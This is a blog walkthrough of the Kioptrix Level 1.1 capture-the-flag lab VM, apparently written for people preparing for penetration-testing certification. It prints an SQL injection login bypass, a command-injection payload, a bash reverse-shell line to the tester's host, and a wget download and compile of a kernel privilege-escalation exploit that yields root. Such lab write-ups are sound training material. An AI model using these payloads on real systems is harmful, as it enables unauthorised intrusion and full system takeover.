Vulnhub – Kioptrix: Level 1.1 (#2)

Kioptrix: Level 1.1 (#2) is the second VM of the Kioptrix series which can be found here. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification.

Description from the author:
“This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.”

Lets get started!

Kali Linux machine

 192.168.182.147 

Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.152

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning

Using nmap you can see the server is running OpenSSH 3.9p1 on port 22/tcp, Apache httpd 2.0.52 on port 80/tcp, Apache httpd 2.0.52 on port 443/tcp, CUPS 1.1 on port 631/tcp, and MySQL on port 3306/tcp. It’s probable that this web server has a back-end database running SQL on it ,which might be vulnerable to an SQL injection.

root@kali:~# nmap -sS -T4 -A 192.168.182.152

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-02-25 14:11 CST
Nmap scan report for 192.168.182.152
Host is up (0.00019s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            621/udp  status
|_  100024  1            624/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| http-cisco-anyconnect: 
|_  ERROR: Not a Cisco ASA or unsupported version
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2017-02-25T18:02:19+00:00; -2h09m45s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods: Potentially risky methods: PUT
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:5C:FF:EC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.19 ms 192.168.182.152

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.62 seconds
root@kali:~# 

Exploitation (SQL and Command Injection)

Browsing to the server, I found that it displays a login page. Next, I will try to perform and SQL Injection.

I tested the login form using ‘ or ‘1’=’1 and it worked.

The reason why it probably worked was because the SQL statement is along the lines of this:

 SELECT * FROM users WHERE username='$username' AND password='$password'

Supplying the username and password with ‘ or ‘1’=’1 will turn the SQL statement into:

 SELECT username FROM users WHERE username='' or '1'='1' AND password='' or '1'='1'

Because ‘ or ‘1’=’1 always means true, this SELECT statement will log us in and return the first username for the user table.

So now we have a Ping command prompt which might be vulnerable to a Command Injection. Using the command ; id I found that the application was vulnerable to a command injection, so I also tried to see if I could get the usernames and passwords on the server. I was able to get the /etc/passwd file but didnt have access to /etc/shadow .

Knowing that the application is vulnerable to a command injection, I took it a step further and tried to get a reverse shell.
Used ncat to set up the listener to catch the reverse shell.

root@kali:~# nc -nvlp 443

Then went back to the console on the website and ran the following command to get the reverse shell:

; bash -i >& /dev/tcp/192.168.182.147/443 0>&1


I successfully got a reverse shell and as apache. I will next try to do privilege escalation to get the desired root account.

bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux
bash-3.00$ cat /etc/*-release
CentOS release 4.5 (Final)
bash-3.00$

It looks like the server is running CentOS release 4.5 which after doing some research, I found it was vulnerable to the ‘ip_append_data()’ Ring0 Privilege Escalation exploit..

So on the the shell that we recently obtained, I used wget to download the exploit to the server.

bash-3.00$ wget https://www.exploit-db.com/download/9542 --no-check-certificate
--16:20:14--  https://www.exploit-db.com/download/9542
           => `9542'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [application/txt]

    0K ..                                                    100%   40.04 MB/s

16:20:14 (40.04 MB/s) - `9542' saved [2645/2645]

bash-3.00$ ls
9542 

Then I compiled the program, and ran the exploit to get root shell that we all desire.

bash-3.00$ ls
9542
bash-3.00$ mv 9542 9542.c
bash-3.00$ gcc 9542.c
bash-3.00$ ls -l
total 12
-rw-r--r--  1 apache apache 2645 Feb 25 16:20 9542.c
-rwxr-xr-x  1 apache apache 6932 Feb 25 16:21 a.out
bash-3.00$ ./a.out
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# whoami
root
sh-3.00# 
sh-3.00# hostname
kioptrix.level2
sh-3.00# 

Straightforward and to the point. Now on to level 3!

8 comments

  1. Valuable information. Lucky me I found your web site unintentionally,
    and I’m shocked why this accident did not came about earlier!
    I bookmarked it.

    1. It is honestly good to know that my material is really helpful to someone. I’m glad that I could help. Will do more write ups in the weeks to come. Also doing some github programs since I’ve been reading “Violent Python: A cookbook for hackers, forensic analysts, pentration testers, and security engineers,” so expect some more stuff in the future. If you have any recommendations on what other vm’s i should try then let me know so I can try to do a write up on it.

      1. Hi Guillermo, we are on the same page, I’m also learning Python, studying for Pentesting, we should study together:)

        1. I was doing a bit of python earlier last month, but life happened and I haven’t been able to keep up with it. At the moment I’m relearning x86 assembly to get into reverse engineering. Will start brushing up on python again before I the semester starts. If anything I’m part of a pentesting community on discord . They talk about python and much more there if you’re interested I could give you the link? Could study with me and others if you like?

          1. Could you share the link to the discord channel? I’m studying for OSCP and it’d probably be helpful. Thanks

Leave a Reply

Your email address will not be published. Required fields are marked *